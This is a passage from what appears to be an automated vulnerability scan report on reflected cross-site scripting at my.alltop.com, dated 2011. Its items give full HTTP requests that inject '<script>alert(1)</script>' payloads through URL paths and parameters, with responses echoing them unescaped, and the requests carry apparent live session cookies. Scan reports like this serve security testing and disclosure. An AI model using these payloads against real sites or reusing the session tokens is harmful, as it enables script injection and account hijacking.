Content-Type: text/html; charset=utf-8
Content-Length: 24546

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/abe629"><script>alert(1)</script>f2ad206645/%22ns=%22netsparker(0x00011B)" method="post" accept-charset="utf-8">
...[SNIP]...

1.37. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%22ns=%22netsparker(0x00011B)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86b93"><script>alert(1)</script>b2cb0933293 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a/%22ns86b93"><script>alert(1)</script>b2cb0933293=%22netsparker(0x00011B) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:57 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:57 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:57 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:57 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24550

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a/%22ns86b93"><script>alert(1)</script>b2cb0933293=%22netsparker(0x00011B)" method="post" accept-charset="utf-8">
...[SNIP]...

1.38. http://my.alltop.com/alpha/a/%22ns=%22netsparker(0x00011B) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%22ns=%22netsparker(0x00011B)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38877"><script>alert(1)</script>a320b4a355e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a/%22ns=%22netsparker(0x00011B)?38877"><script>alert(1)</script>a320b4a355e=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:48 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:49 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:49 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a/%22ns=%22netsparker(0x00011B)?38877"><script>alert(1)</script>a320b4a355e=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.39. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65e90"><script>alert(1)</script>b0cec35769d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a65e90"><script>alert(1)</script>b0cec35769d/%2522ns%253D%2522netsparker%25280x000127%2529) HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:50 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:51 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:51 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a65e90"><script>alert(1)</script>b0cec35769d/%2522ns%253D%2522netsparker%25280x000127%2529)" method="post" accept-charset="utf-8">
...[SNIP]...

1.40. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76708"><script>alert(1)</script>90f73ef6e41 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)76708"><script>alert(1)</script>90f73ef6e41 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:51 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:51 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:53 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:53 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24618

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)76708"><script>alert(1)</script>90f73ef6e41" method="post" accept-charset="utf-8">
...[SNIP]...

1.41. http://my.alltop.com/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529) [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c37ee"><script>alert(1)</script>716a484ee8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)?c37ee"><script>alert(1)</script>716a484ee8e=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:47 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:49:47 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24630

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/a/%2522ns%253D%2522netsparker%25280x000127%2529)?c37ee"><script>alert(1)</script>716a484ee8e=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.42. http://my.alltop.com/alpha/b ['"--> parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b

Issue detail

The value of the '"--></style></script><script>netsparker(0x00017A)</script> request parameter is copied into the HTML document as plain text between tags. The payload 18e8f<script>alert(1)</script>0a0bffe1674 was submitted in the '"--></style></script><script>netsparker(0x00017A)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b?'"--></style></script><script>netsparker(0x00017A)</script>18e8f<script>alert(1)</script>0a0bffe1674 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:22 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:23 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:23 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>18e8f<script>alert(1)</script>0a0bffe1674" method="post" accept-charset="utf-8">
...[SNIP]...

1.43. http://my.alltop.com/alpha/b [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6223d"><script>alert(1)</script>84589b18223 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b6223d"><script>alert(1)</script>84589b18223 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:47 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:47 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b6223d"><script>alert(1)</script>84589b18223" method="post" accept-charset="utf-8">
...[SNIP]...

1.44. http://my.alltop.com/alpha/b [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7c33"><script>alert(1)</script>599ca4a5324 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b?f7c33"><script>alert(1)</script>599ca4a5324=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:48:41 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:48:41 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:48:44 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:48:44 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/b?f7c33"><script>alert(1)</script>599ca4a5324=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.45. http://my.alltop.com/alpha/b [nsextt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/b

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33c92"><script>alert(1)</script>c39e161a26a was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/b?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000E9)%3C/script%3E33c92"><script>alert(1)</script>c39e161a26a HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:46 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:47 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
